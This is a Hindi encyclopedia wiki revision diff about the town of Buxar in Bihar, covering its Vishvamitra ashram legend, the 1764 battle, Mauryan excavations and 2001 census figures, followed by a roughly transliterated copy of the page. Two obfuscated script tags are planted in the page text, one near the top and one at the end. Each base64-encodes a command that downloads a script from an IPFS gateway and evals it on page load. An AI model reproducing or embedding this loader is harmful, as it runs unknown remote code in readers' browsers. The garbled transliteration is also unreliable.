Difference between revisions of "बक्सर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - " महान " to " महान् ")
 
(8 intermediate revisions by 6 users not shown)
Line 1: Line 1:
बक्सर में गुरु [[विश्वामित्र]] का आश्रम था। यहीं पर [[राम]] और [[लक्ष्मण]] का प्रारम्भिक शिक्षण-प्रशिक्षण हुआ। प्रसिद्ध [[ताड़का]] राक्षसी का वध राम द्वारा यहीं पा किया गया था। 1764 ई. का 'बक्सर युद्ध' भी इतिहास प्रसिद्ध है।
+
==स्थिति==
 +
{{tocright}}
 +
बक्सर नगर [[भारत]] गणराज्य के राज्य [[बिहार]] के ऐतिहासिक नगर, [[पटना]] से 120 कि.मी. पश्चिम में, [[गंगा नदी]] के दक्षिण तट पर स्थित है।
  
 +
==इतिहास==
 +
बक्सर में [[विश्वामित्र आश्रम|विश्वामित्र का आश्रम]] था। यहीं पर [[राम]] और [[लक्ष्मण]] का प्रारम्भिक शिक्षण-प्रशिक्षण हुआ। प्रसिद्ध [[ताड़का]] राक्षसी का वध राम द्वारा यहीं पा किया गया था। 1764 ई. का 'बक्सर युद्ध' भी इतिहास प्रसिद्ध है। इसी नाम का एक ज़िला शाहबाद ( बिहार में ) का अनुमंडल है। [[बक्सर का युद्ध|बक्सर के युद्ध]] ( 1764 ) के परिणामस्वरूप निचले बंगाल का अंतिम रूप से ब्रिटिश अधिग्रहण हो गया। मान्यता है कि एक महान् पवित्र स्थल के रूप में पहले इसका मूल नाम वेदगर्भ था। कहा जाता है कि वैदिक मंत्रों के बहुत से रचयिता इस नगर में रहते थे। इसका संबंध भगवान राम के प्रारंभिक जीवन से भी जोड़ा जाता है।
 +
;उत्खनन
  
[[Category:बिहार]]
+
मौर्यकाल की अनेक सुंदर लघु मूर्तियाँ बक्सर उत्खनन में प्राप्त हुई थीं जो अब पटना संग्रहालय में सुरक्षित हैं।
[[Category:बिहार_के_नगर]]
+
==कृषि==
[[Category:बिहार_के_पर्यटन_स्थल]]
+
==व्यापार और उद्योग==
 +
==शिक्षा==
 +
बक्सर में इंडियन इंस्टिट्यूट ऑफ़ हार्डवेयर टेक्नोलॉजी स्थित है।
 +
==जनसंख्या==
 +
2001 की जनगणना के अनुसार बक्सर नगर की जनसंख्या 82,795 और ज़िले की कुल जनसंख्या 14,03,462 है।
 +
 
 +
{{लेख प्रगति |आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
 +
==संबंधित लेख==
 +
{{बिहार के पर्यटन स्थल}}{{बिहार के नगर}}
 +
[[Category:बिहार]][[Category:बिहार_के_नगर]][[Category:बिहार के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थान कोश]][[Category:भारत के नगर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:04, 1 August 2017

sthiti

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

baksar nagar bharat ganarajy ke rajy bihar ke aitihasik nagar, patana se 120 ki.mi. pashchim mean, ganga nadi ke dakshin tat par sthit hai.

itihas

baksar mean vishvamitr ka ashram tha. yahian par ram aur lakshman ka prarambhik shikshan-prashikshan hua. prasiddh ta daka rakshasi ka vadh ram dvara yahian pa kiya gaya tha. 1764 ee. ka 'baksar yuddh' bhi itihas prasiddh hai. isi nam ka ek zila shahabad ( bihar mean ) ka anumandal hai. baksar ke yuddh ( 1764 ) ke parinamasvaroop nichale bangal ka aantim roop se british adhigrahan ho gaya. manyata hai ki ek mahanh pavitr sthal ke roop mean pahale isaka mool nam vedagarbh tha. kaha jata hai ki vaidik mantroan ke bahut se rachayita is nagar mean rahate the. isaka sanbandh bhagavan ram ke praranbhik jivan se bhi jo da jata hai.

utkhanan

mauryakal ki anek suandar laghu moortiyaan baksar utkhanan mean prapt huee thian jo ab patana sangrahalay mean surakshit haian.

krishi

vyapar aur udyog

shiksha

baksar mean iandiyan ianstityoot aauf hardaveyar teknol aauji sthit hai.

janasankhya

2001 ki janaganana ke anusar baksar nagar ki janasankhya 82,795 aur zile ki kul janasankhya 14,03,462 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>